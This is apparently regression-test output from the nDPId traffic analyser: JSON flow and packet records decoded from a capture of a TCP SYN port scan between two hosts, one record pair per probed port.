+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058720,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058720,"pkt":"ACYLMQczACWzv5HuCABFAAAsa28AACwGsQOsEAAIQA2GNIzTABHdU4MZAAAAAGACBAA0ewAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"synscan.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs1BIAADMGQWCsEAAIQA2GNIzTFF7dU4MZAAAAAGACEAAULgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"synscan.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyOsAADQGS4esEAAIQA2GNIzSEyPdUoMYAAAAAGACBAAhbAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMVIAACcG8CCsEAAIQA2GNIzSzoXdUoMYAAAAAGACEABaCQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"synscan.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsMDcAADAG6DusEAAIQA2GNIzSD6bdUoMYAAAAAGACBAAk6QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs8eUAADYGII2sEAAIQA2GNIzSDaXdUoMYAAAAAGACDAAe6gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"synscan.pcap","alias":"nDPId-test","flow_id":337,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsK+QAADAG7I6sEAAIQA2GNIzSDpndUoMYAAAAAGACBAAl9gAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"synscan.pcap","alias":"nDPId-test","flow_id":338,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbD8AACsGsTOsEAAIQA2GNIzSFGXdUoMYAAAAAGACEAAUKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsX\/kAACUGw3msEAAIQA2GNIzSE9jdUoMYAAAAAGACCAActwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAs3xYAACYGQ1ysEAAIQA2GNIzSB+TdUoMYAAAAAGACDAAkqwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsbhsAAC8Gq1esEAAIQA2GNIzSu9DdUoMYAAAAAGACEABsvgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgMAADsG62+sEAAIQA2GNIzSTv7dUoMYAAAAAGACEADZkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058721,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"synscan.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058721,"pkt":"ACYLMQczACWzv5HuCABFAAAsyKUAACsGVM2sEAAIQA2GNIzSF0vdUoMYAAAAAGACEAARRAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"synscan.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzMAADQGpT+sEAAIQA2GNIzSBfTdUoMYAAAAAGACBAAumwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"synscan.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsq8MAADUGZ6+sEAAIQA2GNIzSBILdUoMYAAAAAGACCAAsDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"synscan.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsphAAADsGZ2KsEAAIQA2GNIzSH5bdUoMYAAAAAGACEAAI+QAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"synscan.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsMxUAADMG4l2sEAAIQA2GNIzSBBfdUoMYAAAAAGACEAAkeAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"synscan.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsHAEAADUG93GsEAAIQA2GNIzSBCTdUoMYAAAAAGACCAAsawAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2522,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/AsAADIGGmesEAAIQA2GNIzSCdrdUoMYAAAAAGACDAAitQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsgb0AADIGlLWsEAAIQA2GNIzSB\/7dUoMYAAAAAGACDAAkkQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAssgsAAC4GaGesEAAIQA2GNIzSDZTdUoMYAAAAAGACDAAe+wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAspfEAACcGe4GsEAAIQA2GNIzSCvvdUoMYAAAAAGACEAAdlAAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsV3wAADYGuvasEAAIQA2GNIzSECHdUoMYAAAAAGACDAAcbgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLYAADoG6bysEAAIQA2GNIzSPoHdUoMYAAAAAGACDADuDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 